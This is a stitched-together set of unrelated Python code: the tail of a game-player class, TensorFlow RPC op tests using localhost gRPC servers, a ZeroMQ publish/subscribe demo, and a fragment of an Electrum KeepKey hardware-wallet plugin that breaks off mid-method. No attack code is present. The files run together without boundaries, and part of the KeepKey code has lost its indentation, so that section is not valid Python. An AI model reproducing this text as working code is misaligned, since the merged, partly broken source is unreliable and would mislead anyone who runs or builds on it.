        self._last_piece = piece
        self._board = board
        self._history = history
        if next_player_color == self.color:
            self.__thread = threading.Thread(target=self.move)
            self.__thread.start()

    def move(self, coordinate=None):
        """Submit a move to the controller (base class plays ``coordinate`` as-is)."""
        # Brief pause before moving.
        time.sleep(0.01)
        self.__game_controller.move(Piece(self.color, coordinate))

    def start_new_game(self):
        pass

    def game_is_over(self, is_win):
        pass
|
rpc_ops_test.py | # Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for rpc_ops.py."""
import threading
import time
import numpy as np
import portpicker
from tensorflow.python.distribute.experimental.rpc import rpc_ops
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function as eager_def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import test_util
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.util import nest
@test_util.with_eager_op_as_function
class RpcOpsTest(test.TestCase):
  def setUp(self):
    """Split the single physical CPU into two logical devices for the tests."""
    super(RpcOpsTest, self).setUp()
    cpus = config.list_physical_devices("CPU")
    # Set 2 virtual CPUs
    config.set_logical_device_configuration(cpus[0], [
        context.LogicalDeviceConfiguration(),
        context.LogicalDeviceConfiguration()
    ])
  def test_generated_rpc_ops(self):
    """Exercise the low-level generated RPC ops end to end.

    Registers a multiply function on an in-process server, calls it through
    a client, and checks both the status code and the returned value.
    """

    @eager_def_function.function(input_signature=[
        tensor_spec.TensorSpec([], dtypes.int32),
        tensor_spec.TensorSpec([], dtypes.int32)
    ])
    def remote_fn(a, b):
      return math_ops.multiply(a, b)

    concrete_remote_fn = remote_fn.get_concrete_function()

    a = variables.Variable(2, dtype=dtypes.int32)
    b = variables.Variable(3, dtype=dtypes.int32)

    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server_resource = rpc_ops.gen_rpc_ops.rpc_server(server_address=address)

    rpc_ops.gen_rpc_ops.rpc_server_register(
        server_resource,
        f=concrete_remote_fn,
        captured_inputs=concrete_remote_fn.captured_inputs,
        output_specs=rpc_ops.get_output_specs_from_function(concrete_remote_fn),
        method_name="multiply")

    rpc_ops.gen_rpc_ops.rpc_server_start(server_resource)
    client_handle, _ = rpc_ops.gen_rpc_ops.rpc_client(
        server_address=address, timeout_in_ms=5000)
    future_resource, deleter = rpc_ops.gen_rpc_ops.rpc_call(
        client_handle, args=[a, b], method_name="multiply", timeout_in_ms=0)

    # Status code 0 means OK.
    error_code, _ = rpc_ops.gen_rpc_ops.rpc_check_status(future_resource)
    self.assertAllEqual(error_code, 0)
    self.assertAllEqual(
        rpc_ops.gen_rpc_ops.rpc_get_value(future_resource, Tout=[dtypes.int32]),
        [6])

    # Tie resource cleanup to eager deleters so the handles are released.
    resource_variable_ops.EagerResourceDeleter(
        handle=server_resource, handle_device=server_resource.device)

    resource_variable_ops.EagerResourceDeleter(
        handle=client_handle, handle_device=client_handle.device)
    rpc_ops.gen_rpc_ops.delete_rpc_future_resource(future_resource, deleter)
  def test_exported_rpc_api_static_factory(self):
    """Covers the Server.create / Client.create static factory API."""

    @eager_def_function.function(input_signature=[
        tensor_spec.TensorSpec([], dtypes.int32),
        tensor_spec.TensorSpec([], dtypes.int32)
    ])
    def _remote_fn(a, b):
      return math_ops.multiply(a, b)

    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server_resource = rpc_ops.Server.create("grpc", address)
    server_resource.register("multiply", _remote_fn)
    server_resource.start()
    client = rpc_ops.Client.create("grpc", address=address, name="test_client")
    a = variables.Variable(2, dtype=dtypes.int32)
    b = variables.Variable(3, dtype=dtypes.int32)
    mul_or = client.call(
        args=[a, b],
        method_name="multiply",
        output_specs=tensor_spec.TensorSpec((), dtypes.int32))
    self.assertAllEqual(mul_or.is_ok(), True)
    self.assertAllEqual(mul_or.get_value(), 6)
    # Test empty client name
    client1 = rpc_ops.Client.create("grpc", address)
    mul_or = client1.call(
        args=[a, b],
        method_name="multiply",
        output_specs=tensor_spec.TensorSpec((), dtypes.int32))
    self.assertAllEqual(mul_or.is_ok(), True)
    self.assertAllEqual(mul_or.get_value(), 6)
    # Test without output_spec — the convenience attribute per method.
    mul_or = client1.multiply(a, b)
    self.assertAllEqual(mul_or.is_ok(), True)
    self.assertAllEqual(mul_or.get_value(), 6)
    self.assertEqual(client1.multiply.__doc__,
                     "RPC Call for multiply method to server " + address)

  def test_rpc_ops_wrapper(self):
    """Covers GrpcServer/GrpcClient wrappers and registering both tf.functions
    and concrete functions."""

    @eager_def_function.function(input_signature=[
        tensor_spec.TensorSpec([], dtypes.int32),
        tensor_spec.TensorSpec([], dtypes.int32)
    ])
    def _remote_fn(a, b):
      return math_ops.multiply(a, b)

    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server_resource = rpc_ops.GrpcServer(address)

    @eager_def_function.function(input_signature=[
        tensor_spec.TensorSpec([], dtypes.int32),
        tensor_spec.TensorSpec([], dtypes.int32)
    ])
    def add_fn(a, b):
      return math_ops.add(a, b)

    # Register TF function
    server_resource.register("multiply", _remote_fn)
    # Register concrete Function
    server_resource.register("add", add_fn.get_concrete_function())
    server_resource.start()
    client = rpc_ops.GrpcClient(address=address, name="test_client")
    a = variables.Variable(2, dtype=dtypes.int32)
    b = variables.Variable(3, dtype=dtypes.int32)
    mul_or = client.call(
        args=[a, b],
        method_name="multiply",
        output_specs=tensor_spec.TensorSpec((), dtypes.int32))
    self.assertAllEqual(mul_or.is_ok(), True)
    self.assertAllEqual(mul_or.get_value(), 6)
    add_or = client.call(
        args=[a, b],
        method_name="add",
        output_specs=tensor_spec.TensorSpec((), dtypes.int32))
    self.assertAllEqual(add_or.is_ok(), True)
    self.assertAllEqual(add_or.get_value(), 5)
    # Test empty client name
    client1 = rpc_ops.GrpcClient(address, list_registered_methods=True)
    mul_or = client1.call(
        args=[a, b],
        method_name="multiply",
        output_specs=tensor_spec.TensorSpec((), dtypes.int32))
    self.assertAllEqual(mul_or.is_ok(), True)
    self.assertAllEqual(mul_or.get_value(), 6)
    # Test without output_spec
    mul_or = client1.multiply(a, b)
    self.assertAllEqual(mul_or.is_ok(), True)
    self.assertAllEqual(mul_or.get_value(), 6)
    self.assertEqual(client1.multiply.__doc__,
                     "RPC Call for multiply method to server " + address)
  def test_output_specs(self):
    """Verifies nested/dict/bool/empty return structures survive the RPC."""

    @eager_def_function.function(
        input_signature=[tensor_spec.TensorSpec([], dtypes.int32)])
    def test_dict(val):
      return {"key": val}

    @eager_def_function.function(
        input_signature=[tensor_spec.TensorSpec([], dtypes.int32)])
    def is_positive(a):
      if a > 0:
        return True
      return False

    @eager_def_function.function(input_signature=[])
    def do_nothing():
      return []

    @eager_def_function.function(
        input_signature=[tensor_spec.TensorSpec([], dtypes.int32)])
    def test_nested_structure(v):
      return {"test": (v, [v, v]), "test1": (v,)}

    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server_resource = rpc_ops.GrpcServer(address)
    server_resource.register("test_dict", test_dict)
    server_resource.register("is_positive", is_positive)
    server_resource.register("test_nested_structure", test_nested_structure)
    server_resource.register("do_nothing", do_nothing)
    server_resource.start()
    client = rpc_ops.GrpcClient(
        address=address, name="test_client", list_registered_methods=True)
    a = variables.Variable(2, dtype=dtypes.int32)
    result_or = client.test_dict(a)
    self.assertAllEqual(result_or.is_ok(), True)
    nest.map_structure(self.assertAllEqual, result_or.get_value(), {"key": 2})
    self.assertTrue(client.is_positive(a))
    result_or = client.test_nested_structure(a)
    self.assertAllEqual(result_or.is_ok(), True)
    nest.map_structure(self.assertAllEqual, result_or.get_value(), {
        "test": (2, [2, 2]),
        "test1": (2,)
    })
    result_or = client.do_nothing()
    self.assertAllEqual(result_or.is_ok(), True)
    self.assertAllEqual(result_or.get_value(), [])

  def test_input_specs(self):
    """Verifies structured (dict) inputs are validated against the signature."""

    @eager_def_function.function(input_signature=[{
        "a": tensor_spec.TensorSpec([], dtypes.int32),
        "b": tensor_spec.TensorSpec([], dtypes.int32)
    }])
    def test_input_dict(value):
      return math_ops.add(value["a"], value["b"])

    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server_resource = rpc_ops.GrpcServer(address)
    server_resource.register("test_input_dict", test_input_dict)
    server_resource.start()
    client = rpc_ops.GrpcClient(
        address=address, name="test_client", list_registered_methods=True)
    a = variables.Variable(2, dtype=dtypes.int32)
    b = variables.Variable(3, dtype=dtypes.int32)
    result_or = client.test_input_dict({"a": a, "b": b})
    self.assertAllEqual(result_or.is_ok(), True)
    self.assertAllEqual(result_or.get_value(), 5)
    # A list does not match the dict input signature.
    with self.assertRaises(TypeError):
      client.test_input_dict([a, b])
  def test_call_register_ordering(self):
    """Checks client/server creation ordering and late-registration errors."""
    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    # Create client succeeds before server start and registration
    client = rpc_ops.GrpcClient(address)
    # Create client with list_registered_methods fails before server is started.
    with self.assertRaises(errors.DeadlineExceededError):
      rpc_ops.GrpcClient(
          address,
          name="client1",
          list_registered_methods=True,
          timeout_in_ms=1)
    v = variables.Variable(initial_value=0, dtype=dtypes.int64)

    @eager_def_function.function(
        input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
    def assign_add(a):
      v.assign_add(a)

    @eager_def_function.function(input_signature=[])
    def read_var():
      return v.value()

    server = rpc_ops.GrpcServer(address)

    def start_server():
      # Delay server start to test whether client creation also waits
      # till server is up.
      time.sleep(1)
      server.register("assign_add", assign_add)
      server.start()

    t = threading.Thread(target=start_server)
    t.start()
    # Create same "client1" again should succeed.
    client1_with_listed_methods = rpc_ops.GrpcClient(
        address, name="client1", list_registered_methods=True)
    result_or = client1_with_listed_methods.assign_add(
        variables.Variable(2, dtype=dtypes.int64))
    self.assertAllEqual(result_or.is_ok(), True)
    result_or = client.call("assign_add",
                            [variables.Variable(2, dtype=dtypes.int64)])
    self.assertAllEqual(result_or.is_ok(), True)
    # Create client with registered methods
    client2_with_listed_methods = rpc_ops.GrpcClient(
        address=address, name="client2", list_registered_methods=True)
    result_or = client2_with_listed_methods.assign_add(
        variables.Variable(2, dtype=dtypes.int64))
    self.assertAllEqual(result_or.is_ok(), True)
    # Three successful assign_add(2) calls above.
    self.assertAllEqual(v, 6)
    # Register new method after server started.
    with self.assertRaisesRegex(
        errors.FailedPreconditionError,
        "All methods must be registered before starting the server"):
      server.register("read_var", read_var)

  def test_client_timeout(self):
    """Checks per-client default timeouts and per-call timeout overrides."""
    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)

    @eager_def_function.function(input_signature=[
        tensor_spec.TensorSpec([], dtypes.int32),
        tensor_spec.TensorSpec([], dtypes.int32)
    ])
    def add(a, b):
      return math_ops.add(a, b)

    server = rpc_ops.GrpcServer(address)

    def start_server():
      # Delay server start to simulate deadline exceeded for 1st RPC call
      # response. Client waits till server is started, thus it can trigger
      # deadline exceeded.
      time.sleep(1)
      server.register("add", add)
      server.start()

    t = threading.Thread(target=start_server)
    t.start()
    # Create client with list_registered_methods fails before server is started.
    with self.assertRaises(errors.DeadlineExceededError):
      rpc_ops.GrpcClient(
          address,
          name="client1",
          list_registered_methods=True,
          timeout_in_ms=1)
    # Create same client again should succeed with
    # list_registered_methods=False. Default timeout for client is 1 ms.
    client = rpc_ops.GrpcClient(
        address, name="client1", list_registered_methods=False, timeout_in_ms=1)
    # Make explicit RPC call, the default timeout of 1 ms should lead to
    # deadline exceeded error.
    result_or = client.call(
        "add", [constant_op.constant(20),
                constant_op.constant(30)])
    self.assertAllEqual(result_or.is_ok(), False)
    error_code, _ = result_or.get_error()
    self.assertAllEqual(error_code, errors.DEADLINE_EXCEEDED)
    # Specifying reasonable timeout for call should succeed.
    result_or = client.call(
        "add", [constant_op.constant(20),
                constant_op.constant(30)],
        timeout_in_ms=5000)
    self.assertAllEqual(result_or.is_ok(), True)
    # NOTE(review): the call above succeeded, so this get_error() result is
    # unused — looks like leftover; confirm and remove.
    error_code, _ = result_or.get_error()
    # Test timeouts for convenience methods
    # Client with no default timeout.
    client = rpc_ops.GrpcClient(
        address, name="client2", list_registered_methods=True)
    # Restart server again with delay to simulate deadline exceeded.
    del server
    server = rpc_ops.GrpcServer(address)
    t = threading.Thread(target=start_server)
    t.start()
    # Call fails with 1 ms timeout.
    result_or = client.add(
        constant_op.constant(20), constant_op.constant(30), timeout_in_ms=1)
    self.assertAllEqual(result_or.is_ok(), False)
    error_code, _ = result_or.get_error()
    self.assertAllEqual(error_code, errors.DEADLINE_EXCEEDED)
    # Succeeds with reasonable timeout.
    result_or = client.add(
        constant_op.constant(20), constant_op.constant(30), timeout_in_ms=5000)
    self.assertAllEqual(result_or.is_ok(), True)
  def test_async_call_op_wrapper(self):
    """Fires many calls without immediately reading results, then verifies
    the aggregate effect on the server-side variable."""
    v = variables.Variable(initial_value=0, dtype=dtypes.int64)

    @eager_def_function.function(
        input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
    def assign_add(a):
      v.assign_add(a)

    @eager_def_function.function(input_signature=[])
    def read_var():
      return v.value()

    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server = rpc_ops.GrpcServer(address)
    server.register("assign_add", assign_add)
    server.register("read_var", read_var)
    server.start()
    client = rpc_ops.GrpcClient(address)
    futures = []
    for _ in range(10):
      futures.append(
          client.call("assign_add",
                      [variables.Variable(2, dtype=dtypes.int64)]))
    for f in futures:
      # NOTE(review): return value discarded — presumably is_ok() blocks
      # until the call completes; confirm against rpc_ops.
      f.is_ok()
    result_or = client.call(
        "read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
    self.assertAllEqual(result_or.is_ok(), True)
    # 10 assign_add(2) calls.
    self.assertAllEqual(result_or.get_value(), [20])

  def test_rpc_call_op_in_tf_function(self):
    """Makes an RPC call from inside a tf.function-traced body."""

    @eager_def_function.function(input_signature=[
        tensor_spec.TensorSpec([], dtypes.int32),
        tensor_spec.TensorSpec([], dtypes.int32)
    ])
    def _remote_fn(a, b):
      return math_ops.multiply(a, b)

    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server_resource = rpc_ops.GrpcServer(address)
    server_resource.register("remote_fn", _remote_fn)
    server_resource.start()
    client = rpc_ops.GrpcClient(address=address, name="test_client")
    a = variables.Variable(2, dtype=dtypes.int32)
    b = variables.Variable(3, dtype=dtypes.int32)

    @eager_def_function.function
    def call_fn():
      result_or = client.call(
          args=[a, b],
          method_name="remote_fn",
          output_specs=[tensor_spec.TensorSpec([], dtypes.int32)])
      self.assertAllEqual(True, result_or.is_ok())
      result = result_or.get_value()
      self.assertEqual(len(result), 1)  # Call returns a list(tensors)
      # TODO(ishark): Shape for output tensor is unknown currently.
      # Add attribute for capturing TensorSpec for output and enable
      # check below:
      # self.assertIsNotNone(result[0].shape.rank)
      return result

    self.assertAllEqual(call_fn(), [6])
  def test_resource_deletion(self):
    """Verifies future/client/server resources are destroyed when their
    Python wrappers go away (eager and tf.function paths)."""
    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server = rpc_ops.GrpcServer(address)
    # Keep the raw handle so we can probe the resource after `del server`.
    server_handle = server._server_handle
    # Test Future resource deletion
    v = variables.Variable(initial_value=0, dtype=dtypes.int64)

    @eager_def_function.function(input_signature=[])
    def read_var():
      return v.value()

    server.register("read_var", read_var)
    server.start()
    client = rpc_ops.GrpcClient(address)
    client_handle = client._client_handle

    # Check future resource deletion without calling get_value.
    def _create_and_delete_rpc_future():
      handle = client.call(
          "read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
      return handle._status_or

    @eager_def_function.function
    def _create_and_delete_rpc_future_fn():
      handle = client.call(
          "read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
      return handle._status_or

    for _ in range(2):
      handle = _create_and_delete_rpc_future()
      # Resource must already be gone: destroying it again raises NotFound.
      with self.assertRaises(errors.NotFoundError):
        resource_variable_ops.destroy_resource_op(
            handle, ignore_lookup_error=False)
    for _ in range(2):
      handle = _create_and_delete_rpc_future_fn()
      with self.assertRaises(errors.NotFoundError):
        resource_variable_ops.destroy_resource_op(
            handle, ignore_lookup_error=False)

    # Check future resource deletion with calling get_value.
    def _create_and_delete_with_future():
      handle = client.call(
          "read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
      status_or_handle = handle._status_or
      handle.get_value()
      return status_or_handle

    # Check future resource deletion with calling get_value with tf.function.
    @eager_def_function.function
    def _create_and_delete_with_future_fn():
      handle = client.call(
          "read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
      status_or_handle = handle._status_or
      handle.get_value()
      return status_or_handle

    for _ in range(2):
      resource_handle = _create_and_delete_with_future()
      with self.assertRaises(errors.NotFoundError):
        resource_variable_ops.destroy_resource_op(
            resource_handle, ignore_lookup_error=False)
    for _ in range(2):
      resource_handle = _create_and_delete_with_future_fn()
      with self.assertRaises(errors.NotFoundError):
        resource_variable_ops.destroy_resource_op(
            resource_handle, ignore_lookup_error=False)
    # Test server client resource gets deleted.
    del client
    with self.assertRaises(errors.NotFoundError):
      resource_variable_ops.destroy_resource_op(
          client_handle, ignore_lookup_error=False)
    # Test server server resource gets deleted.
    del server
    with self.assertRaises(errors.NotFoundError):
      resource_variable_ops.destroy_resource_op(
          server_handle, ignore_lookup_error=False)
  def test_rpc_error(self):
    """Checks error propagation when a method is called with missing args."""
    v = variables.Variable(initial_value=0, dtype=dtypes.int64)

    @eager_def_function.function(
        input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
    def assign_add(a):
      v.assign_add(a)

    @eager_def_function.function(input_signature=[])
    def read_var():
      return v.value()

    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server = rpc_ops.GrpcServer(address)
    server.register("assign_add", assign_add)
    server.register("read_var", read_var)
    server.start()
    client = rpc_ops.GrpcClient(address, list_registered_methods=True)
    # confirm it works as expected when arguments are passed.
    result_or = client.call("assign_add",
                            [variables.Variable(2, dtype=dtypes.int64)])
    self.assertAllEqual(result_or.is_ok(), True)
    result_or = client.call(
        "read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
    self.assertAllEqual(result_or.is_ok(), True)
    self.assertAllEqual(result_or.get_value(), [2])
    result_or = client.assign_add(variables.Variable(2, dtype=dtypes.int64))
    self.assertAllEqual(True, result_or.is_ok())
    result_or = client.read_var()
    self.assertAllEqual(True, result_or.is_ok())
    self.assertAllEqual(result_or.get_value(), 4)
    # Fails with invalid argument error when no arguments are passed.
    result_or = client.call("assign_add")
    self.assertAllEqual(result_or.is_ok(), False)
    error_code, _ = result_or.get_error()
    self.assertAllEqual(error_code, errors.INVALID_ARGUMENT)

  def test_captured_inputs(self):
    """Verifies functions capturing outer variables keep state across calls."""
    v = variables.Variable(initial_value=0, dtype=dtypes.int64)

    @eager_def_function.function(
        input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
    def assign_add(a):
      v.assign_add(a)

    @eager_def_function.function(input_signature=[])
    def read_var():
      return v.value()

    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server = rpc_ops.GrpcServer(address)
    server.register("assign_add", assign_add)
    server.register("read_var", read_var)
    server.start()
    client = rpc_ops.GrpcClient(address)
    result_or = client.call("assign_add",
                            [variables.Variable(2, dtype=dtypes.int64)])
    self.assertAllEqual(result_or.is_ok(), True)
    result_or = client.call("assign_add",
                            [variables.Variable(2, dtype=dtypes.int64)])
    self.assertAllEqual(result_or.is_ok(), True)
    result_or = client.call(
        "read_var", output_specs=[tensor_spec.TensorSpec([], dtypes.int64)])
    self.assertAllEqual(result_or.is_ok(), True)
    self.assertAllEqual(result_or.get_value(), [4])

  def test_register_method_twice(self):
    """Registering two functions under the same name must fail."""
    v = variables.Variable(initial_value=0, dtype=dtypes.int64)

    @eager_def_function.function(
        input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
    def assign_add(a):
      v.assign_add(a)

    @eager_def_function.function(
        input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
    def assign(a):
      v.assign(a)

    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server = rpc_ops.GrpcServer(address)
    server.register("assign", assign_add)
    with self.assertRaisesRegex(errors.InvalidArgumentError,
                                "assign is already registered."):
      # Reusing the same error name.
      server.register("assign", assign)

  def test_tf_function_register_without_input_signature(self):
    """tf.functions with args need an input_signature to be registered;
    zero-arg functions do not."""
    v = variables.Variable(initial_value=0, dtype=dtypes.int64)

    @eager_def_function.function
    def assign(a):
      v.assign(a)

    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server = rpc_ops.GrpcServer(address)
    with self.assertRaisesRegex(
        ValueError, "Input signature not specified for the function."):
      server.register("assign", assign)

    # Register without input signature should work for functions without input
    # args.
    @eager_def_function.function
    def read_var():
      return v.value()

    server.register("read_var", read_var)
  def test_multi_device_resource(self):
    """Registers a function touching a resource placed on a second CPU."""
    elements = np.random.randint(100, size=[200])
    with ops.device("/device:CPU:1"):
      queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])

    @eager_def_function.function()
    def populate_queue():
      queue.enqueue_many(elements)
      queue.close()

    with ops.device("/device:CPU:0"):
      port = portpicker.pick_unused_port()
      address = "localhost:{}".format(port)
      server = rpc_ops.GrpcServer(address)
      server.register("populate_queue", populate_queue)
      server.start()
      client = rpc_ops.GrpcClient(address, list_registered_methods=True)
      client.populate_queue()
    for e in elements:
      self.assertAllEqual(e, queue.dequeue())

  def test_queue_resource(self):
    """Same as above but with the queue on the default device."""
    elements = np.random.randint(100, size=[200])
    queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])

    @eager_def_function.function()
    def populate_queue():
      queue.enqueue_many(elements)
      queue.close()

    port = portpicker.pick_unused_port()
    address = "localhost:{}".format(port)
    server = rpc_ops.GrpcServer(address)
    server.register("populate_queue", populate_queue)
    server.start()
    client = rpc_ops.GrpcClient(address, list_registered_methods=True)
    client.populate_queue()
    for e in elements:
      self.assertAllEqual(e, queue.dequeue())

  def test_multi_device_resource_cpu(self):
    """Variable on CPU:1, server on CPU:0 — cross-device variable update."""
    with ops.device("/device:cpu:1"):
      v = variables.Variable(initial_value=0, dtype=dtypes.int64)

    @eager_def_function.function(
        input_signature=[tensor_spec.TensorSpec([], dtypes.int64)])
    def assign_add(a):
      v.assign_add(a)

    with ops.device("/device:CPU:0"):
      port = portpicker.pick_unused_port()
      address = "localhost:{}".format(port)
      server = rpc_ops.GrpcServer(address)
      server.register("assign_add", assign_add)
      server.start()
      client = rpc_ops.GrpcClient(address, list_registered_methods=True)
      result_or = client.assign_add(variables.Variable(2, dtype=dtypes.int64))
      self.assertAllEqual(result_or.is_ok(), True)
    self.assertAllEqual(v, 2)


if __name__ == "__main__":
  ops.enable_eager_execution()
  test.main()
import zmq
import random
import sys
import time
from threading import Thread
def server():
    """Publish b'hi' on a PUB socket every 200 ms, forever.

    The port defaults to 5556 and can be overridden by the first CLI
    argument.
    """
    port = "5556"
    if len(sys.argv) > 1:
        port = sys.argv[1]
    # Validate the port is numeric early (raises ValueError otherwise);
    # the result itself is intentionally discarded.
    int(port)
    context = zmq.Context()
    socket = context.socket(zmq.PUB)
    socket.bind("tcp://127.0.0.1:%s" % port)
    while True:
        socket.send(b'hi')
        time.sleep(.2)
def client():
    """Subscribe to the local publisher and print the first 5 messages.

    Connects a SUB socket to tcp://127.0.0.1:5556 and blocks until five
    updates have been received.
    """
    port = "5556"
    # Socket to talk to server_p
    context = zmq.Context()
    socket = context.socket(zmq.SUB)
    # Bug fix: a SUB socket discards every message until a subscription
    # filter is set (the original setsockopt line was commented out, so
    # recv() blocked forever). Subscribe to all messages.
    socket.setsockopt(zmq.SUBSCRIBE, b"")
    print("Collecting updates from weather server_p...")
    socket.connect("tcp://127.0.0.1:%s" % port)
    # Process 5 updates
    for update_nbr in range(5):
        string = socket.recv()
        print(string)
# Run publisher and subscriber concurrently; non-daemon threads, so the
# process stays alive until both finish (the server loops forever).
t1 = Thread(target=server, name='s')
t2 = Thread(target=client, name='c')
t1.start()
t2.start()

from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_blk.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_blk.bip32 import BIP32Node
from electrum_blk import constants
from electrum_blk.i18n import _
from electrum_blk.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_blk.keystore import Hardware_KeyStore
from electrum_blk.plugin import Device, runs_in_hwd_thread
from electrum_blk.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)


class KeepKey_KeyStore(Hardware_KeyStore):
    """Keystore backed by a KeepKey hardware wallet."""
    hw_type = 'keepkey'
    device = 'KeepKey'

    plugin: 'KeepKeyPlugin'

    def get_client(self, force_pair=True):
        """Return the hardware client for this keystore (pairing if needed)."""
        return self.plugin.get_client(self, force_pair)

    def decrypt_message(self, sequence, message, password):
        # Message decryption is not supported by this plugin.
        raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))

    @runs_in_hwd_thread
    def sign_message(self, sequence, message, password, *, script_type=None):
        """Sign *message* with the key at derivation suffix *sequence* on-device.

        NOTE(review): *password* and *script_type* are accepted for API
        compatibility but not used here.
        """
        client = self.get_client()
        address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
        address_n = client.expand_path(address_path)
        msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
        return msg_sig.signature

    @runs_in_hwd_thread
    def sign_transaction(self, tx, password):
        """Collect previous txs for legacy inputs and delegate signing to the plugin."""
        if tx.is_complete():
            return
        # previous transactions used as inputs
        prev_tx = {}
        for txin in tx.inputs():
            tx_hash = txin.prevout.txid.hex()
            if txin.utxo is None and not txin.is_segwit():
                # Legacy inputs need the full previous tx so the device can
                # verify the amount being spent.
                raise UserFacingException(_('Missing previous tx for legacy input.'))
            prev_tx[tx_hash] = txin.utxo
        self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
    """Electrum plugin for the KeepKey hardware wallet."""
    # Derived classes provide:
    #
    # class-static variables: client_class, firmware_URL, handler_class,
    # libraries_available, libraries_URL, minimum_firmware,
    # wallet_class, ckd_public, types, HidTransport

    firmware_URL = 'https://www.keepkey.com'
    libraries_URL = 'https://github.com/keepkey/python-keepkey'
    minimum_firmware = (1, 0, 0)
    keystore_class = KeepKey_KeyStore
    SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
    # Maximum device label length accepted by the firmware.
    MAX_LABEL_LEN = 32
    def __init__(self, parent, config, name):
        """Set up transports and device registration.

        If keepkeylib is not importable, the plugin stays loaded but marks
        itself unavailable instead of raising.
        """
        HW_PluginBase.__init__(self, parent, config, name)
        try:
            from . import client
            import keepkeylib
            import keepkeylib.ckd_public
            import keepkeylib.transport_hid
            import keepkeylib.transport_webusb
            self.client_class = client.KeepKeyClient
            self.ckd_public = keepkeylib.ckd_public
            self.types = keepkeylib.client.types
            self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
                               keepkeylib.transport_webusb.DEVICE_IDS)
            # only "register" hid device id:
            self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
            # for webusb transport, use custom enumerate function:
            self.device_manager().register_enumerate_func(self.enumerate)
            self.libraries_available = True
        except ImportError:
            self.libraries_available = False
@runs_in_hwd_thread
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
    @runs_in_hwd_thread
    def hid_transport(self, pair):
        """Open a HID transport for the given (path, serial) pair."""
        from keepkeylib.transport_hid import HidTransport
        return HidTransport(pair)
    @runs_in_hwd_thread
    def webusb_transport(self, device):
        """Open a WebUSB transport for *device*, matching by path.

        Returns None implicitly when no enumerated device matches.
        """
        from keepkeylib.transport_webusb import WebUsbTransport
        for dev in WebUsbTransport.enumerate():
            if device.path == self._dev_to_str(dev):
                return WebUsbTransport(dev)
    @runs_in_hwd_thread
    def _try_hid(self, device):
        """Best-effort HID connection; returns the transport or None."""
        self.logger.info("Trying to connect over USB...")
        # HidTransport expects a (normal_path, debug_path) pair; which slot
        # the path goes in depends on the interface number.
        if device.interface_number == 1:
            pair = [None, device.path]
        else:
            pair = [device.path, None]
        try:
            return self.hid_transport(pair)
